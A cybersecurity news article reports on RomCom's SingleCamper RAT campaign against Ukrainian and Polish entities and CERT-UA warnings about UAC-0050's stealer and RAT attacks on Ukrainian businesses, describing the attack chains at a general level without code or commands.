SingleCamper RAT

The Russian threat actor known as RomCom has been linked to a new wave of cyber attacks aimed at Ukrainian government agencies and unknown Polish entities since at least late 2023.

The intrusions are characterized by the use of a variant of the RomCom RAT dubbed SingleCamper (aka SnipBot or RomCom 5.0). Infosec researchers are monitoring the activity cluster under the moniker UAT-5647. This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader.

This Threat Actor Has Launched Numerous Attack Campaigns

RomCom, also known by aliases such as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has been involved in various cyber operations since its emergence in 2022. These operations include ransomware attacks, extortion schemes, and the targeted collection of credentials.

Recent assessments indicate a noticeable increase in their attack frequency, with a focus on establishing long-term access to compromised networks and extracting valuable data, pointing to an espionage-driven agenda.

In support of this, RomCom is reportedly expanding its toolkit and infrastructure, incorporating a wide range of malware components built using multiple programming languages and platforms, including C++ (ShadyHammock), Rust (DustyHammock), Go (GLUEEGG), and Lua (DROPCLUE).

Spear-phishing Tactics to Compromise the Targets

The attack sequences begin with a spear-phishing email that delivers a downloader, which may be written in either C++ (MeltingClaw) or Rust (RustyClaw). This downloader is responsible for deploying the ShadyHammock and DustyHammock backdoors, while a decoy document is displayed to the recipient to maintain the deception.

DustyHammock is designed to communicate with a Command-and-Control (C2) server, execute arbitrary commands, and download files from it. In contrast, ShadyHammock functions as a platform for launching SingleCamper and monitoring incoming commands.

Despite the additional capabilities of ShadyHammock, it is considered a predecessor to DustyHammock, as the latter has been detected in attacks as recently as September 2024.

The SingleCamper RAT is the Latest Iteration

SingleCamper, the latest iteration of the RomCom RAT, is designed for various post-compromise activities. These activities include downloading the Plink tool from PuTTY to create remote tunnels with adversary-controlled infrastructure, conducting network reconnaissance, facilitating lateral movement, discovering users and systems and exfiltrating data.

This particular series of attacks, aimed at high-profile Ukrainian entities, appears to align with UAT-5647's two-fold strategy: to establish long-term access and extract data for extended periods to support espionage goals and potentially pivot to ransomware deployment to disrupt operations and gain financially from the compromise.

Additionally, it is likely that Polish entities were also targeted, as indicated by the keyboard language checks conducted by the malware.

Ukraine Remains the Target of Sophisticated Malware Attacks

The announcement follows a warning from the Computer Emergency Response Team of Ukraine (CERT-UA) regarding cyberattacks conducted by a threat actor known as UAC-0050, who is targeting sensitive information and funds using various malware families, including the Remcos RAT, the SectopRAT, the Xeno RAT, the Lumma Stealer, the Mars Stealer and the Meduza Stealer.

UAC-0050's financial theft operations focus on stealing funds from Ukrainian businesses and private entrepreneurs. This is achieved by gaining unauthorized access to accountants' computers through remote control tools like Remcos and TEKTONITRMS.

Between September and October 2024, UAC-0050 executed at least 30 such attacks, which involved creating fake financial transactions through remote banking systems, with amounts ranging from tens of thousands to several million UAH.

Additionally, CERT-UA has reported observing attempts to spread fraudulent messages via the @reserveplusbot account on the Telegram messaging platform, aiming to deploy the Meduza Stealer malware under the guise of installing special software.